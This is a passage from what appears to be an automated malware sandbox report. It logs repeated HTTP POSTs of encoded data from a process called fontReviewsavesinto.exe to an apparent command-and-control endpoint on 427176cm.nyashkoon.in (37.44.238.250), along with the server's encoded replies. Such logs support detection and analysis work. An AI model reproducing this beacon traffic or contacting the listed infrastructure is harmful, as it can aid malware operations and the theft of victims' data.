                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:52.068077087 CET1032OUTData Raw: 5e 5a 46 58 5c 59 5a 53 5e 5e 54 55 56 53 5a 58 5f 52 59 5b 52 58 52 5b 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^ZFX\YZS^^TUVSZX_RY[RXR[YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.3T/'=>3'8,X>&4[',7*2P%,3=+%8;+:&G!']*
                                        Nov 5, 2024 08:12:52.531138897 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:52.612224102 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:50 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        40192.168.2.74997037.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:52.951339960 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:53.302524090 CET1032OUTData Raw: 5b 58 43 5b 59 5f 5a 51 5e 5e 54 55 56 59 5a 5a 5f 5b 59 5b 52 5f 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [XC[Y_ZQ^^TUVYZZ_[Y[R_RPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.$"3=-'";)4X' =-"$,50[;]3;+*&G!']*+
                                        Nov 5, 2024 08:12:53.767466068 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:53.839678049 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:51 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        41192.168.2.74997637.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:53.961875916 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:54.318248987 CET1028OUTData Raw: 5e 5f 43 5e 5c 5f 5a 5c 5e 5e 54 55 56 5a 5a 58 5f 55 59 58 52 5b 52 5d 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^_C^\_Z\^^TUVZZX_UYXR[R]YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-3/3>:$-+#)','Y>W%<)''Y$8]>*&G!']*#


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        42192.168.2.74998137.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:54.449596882 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:54.802529097 CET1300OUTData Raw: 5b 54 46 58 59 5e 5a 5d 5e 5e 54 55 56 5c 5a 59 5f 54 59 5e 52 51 52 5c 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [TFXY^Z]^^TUV\ZY_TY^RQR\YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-%" _'-=Y$4[,#*%$0,(==3"]$.('$>:&G!']*?
                                        Nov 5, 2024 08:12:55.271466017 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:55.351783991 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:53 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 3a 07 25 28 23 0f 37 2a 3e 50 3f 3d 24 10 21 09 3b 1e 2c 13 2b 01 33 0a 23 0b 2a 01 29 08 20 00 2e 59 36 3d 0d 07 23 2e 02 0b 2a 0b 2f 5a 07 10 25 5a 25 22 0a 0a 31 07 2c 5a 24 1d 3f 18 28 3c 28 12 21 28 3b 5b 27 2b 29 5a 25 04 2f 19 38 07 3d 52 2d 28 37 18 2f 21 30 1c 26 1e 2c 54 0d 10 39 56 2a 0f 0e 57 3e 3c 39 1a 26 24 2b 0a 34 13 06 07 3e 14 28 50 3f 04 3e 5f 25 20 24 51 22 0c 04 0e 32 38 38 5c 30 0f 09 08 25 08 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: :%(#7*>P?=$!;,+3#*) .Y6=#.*/Z%Z%"1,Z$?(<(!(;['+)Z%/8=R-(7/!0&,T9V*W><9&$+4>(P?>_% $Q"288\0%%U,.V0WQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        43192.168.2.74998237.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:54.571856976 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:54.927478075 CET1032OUTData Raw: 5b 59 43 53 5c 5a 5a 53 5e 5e 54 55 56 5b 5a 5f 5f 55 59 58 52 5e 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [YCS\ZZS^^TUV[Z__UYXR^R^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-%"$X'$",;(_*%$,8*13<&^&.#_0$>&G!']*#
                                        Nov 5, 2024 08:12:55.391133070 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:55.468451023 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:53 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        44192.168.2.74998837.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:55.772269964 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:12:56.130708933 CET1032OUTData Raw: 5b 5e 43 59 5c 5a 5f 50 5e 5e 54 55 56 59 5a 50 5f 51 59 5e 52 59 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [^CY\Z_P^^TUVYZP_QY^RYR^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.A$,X%-1%!8-;+=%4^'Z?Z(.-3<20=+$(X>&G!']*+
                                        Nov 5, 2024 08:12:56.582828999 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:56.670603037 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:54 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        45192.168.2.74999537.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:56.790093899 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:57.146174908 CET1032OUTData Raw: 5e 5e 46 59 5c 5a 5a 5d 5e 5e 54 55 56 53 5a 5a 5f 5b 59 58 52 5e 52 51 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^^FY\ZZ]^^TUVSZZ_[YXR^RQYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$,X'.&07,+^)%07_>*P'%'> $83Y=&G!']*
                                        Nov 5, 2024 08:12:57.603951931 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:57.679702044 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:55 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        46192.168.2.75000337.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:57.831782103 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:58.180268049 CET1032OUTData Raw: 5e 5d 43 59 5c 59 5f 56 5e 5e 54 55 56 58 5a 5b 5f 57 59 5c 52 5a 52 5b 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]CY\Y_V^^TUVXZ[_WY\RZR[YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.G$"3=1_%2^;Y*&4Y3<+[*"U$9$=#0+X>&G!']*/
                                        Nov 5, 2024 08:12:58.642144918 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:58.733824968 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:56 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        47192.168.2.75001037.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:58.869741917 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:59.224294901 CET1032OUTData Raw: 5e 5d 43 5e 59 5f 5a 56 5e 5e 54 55 56 5c 5a 50 5f 5a 59 51 52 50 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]C^Y_ZV^^TUV\ZP_ZYQRPRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$! Y$["$7,+$^>'0/(=-1'<&>7$; *:&G!']*?
                                        Nov 5, 2024 08:12:59.693938017 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:59.765176058 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:57 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        48192.168.2.75001537.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:59.900954008 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:00.255709887 CET1032OUTData Raw: 5e 58 46 5e 5c 5f 5a 53 5e 5e 54 55 56 58 5a 5d 5f 54 59 59 52 5f 52 5b 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^XF^\_ZS^^TUVXZ]_TYYR_R[YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.A$28^'>=X3;/;0_)Y'??X=-W3)$8$#]>&G!']*/


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        49192.168.2.75001737.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:00.386843920 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1276
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:00.741700888 CET1276OUTData Raw: 5b 5a 43 5d 59 59 5a 55 5e 5e 54 55 56 5f 5a 51 5f 5a 59 5c 52 59 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [ZC]YYZU^^TUV_ZQ_ZY\RYR^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-%2 0-]$T;;8?=%$Z'_)&T3<_3-?'+\*&G!']*3
                                        Nov 5, 2024 08:13:01.197571039 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:01.280098915 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:59 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 3a 00 24 38 0e 50 20 2a 00 55 28 58 2c 11 36 24 24 00 2f 5b 33 02 30 33 2b 0b 3e 3f 29 0c 34 29 32 10 23 3d 02 1b 20 10 20 0c 2a 0b 2f 5a 07 10 26 00 31 22 20 0a 26 58 3b 02 24 0a 2f 5c 2a 02 3f 04 21 3b 01 5d 31 15 3d 5f 32 04 2b 56 2f 29 00 0a 2e 06 33 5d 39 32 2f 00 32 34 2c 54 0d 10 39 1a 29 1f 0e 57 2a 5a 3e 05 25 0e 28 10 20 03 23 5b 3e 2a 20 1b 3c 13 25 01 30 0e 1d 09 36 0c 2a 0b 24 38 34 1e 25 21 34 50 24 22 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: :$8P *U(X,6$$/[303+>?)4)2#= */Z&1" &X;$/\*?!;]1=_2+V/).3]92/24,T9)W*Z>%( #[>* <%06*$84%!4P$"%U,.V0WQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        50192.168.2.75001837.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:00.512626886 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:00.865135908 CET1032OUTData Raw: 5e 59 43 59 5c 5d 5f 55 5e 5e 54 55 56 59 5a 58 5f 54 59 50 52 5e 52 51 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^YCY\]_U^^TUVYZX_TYPR^RQYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.B'31Y$<,8X?%<_3(=-V'*\$3$'*&G!']*+
                                        Nov 5, 2024 08:13:01.325997114 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:01.401242018 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:59 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        51192.168.2.75002137.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:01.523168087 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:13:01.880660057 CET1032OUTData Raw: 5b 5a 46 59 5c 5e 5f 55 5e 5e 54 55 56 5c 5a 5c 5f 5a 59 58 52 5c 52 59 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [ZFY\^_U^^TUV\Z\_ZYXR\RYYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.G$1 _0=)32#/>&7%<)$<$.#Y0++Y+:&G!']*?
                                        Nov 5, 2024 08:13:02.342749119 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:02.418144941 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:00 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        52192.168.2.75002237.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:02.538974047 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:02.896171093 CET1032OUTData Raw: 5e 5e 43 58 59 5c 5f 52 5e 5e 54 55 56 5d 5a 50 5f 52 59 5a 52 51 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^^CXY\_R^^TUV]ZP_RYZRQRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.F0"[$-%'T 80_?%3$*.2T3Z&0[#X38?]*&G!']*
                                        Nov 5, 2024 08:13:03.130461931 CET1032OUTData Raw: 5e 5e 43 58 59 5c 5f 52 5e 5e 54 55 56 5d 5a 50 5f 52 59 5a 52 51 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^^CXY\_R^^TUV]ZP_RYZRQRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.F0"[$-%'T 80_?%3$*.2T3Z&0[#X38?]*&G!']*
                                        Nov 5, 2024 08:13:03.359819889 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:03.478959084 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:01 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        53192.168.2.75002337.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:03.601104975 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
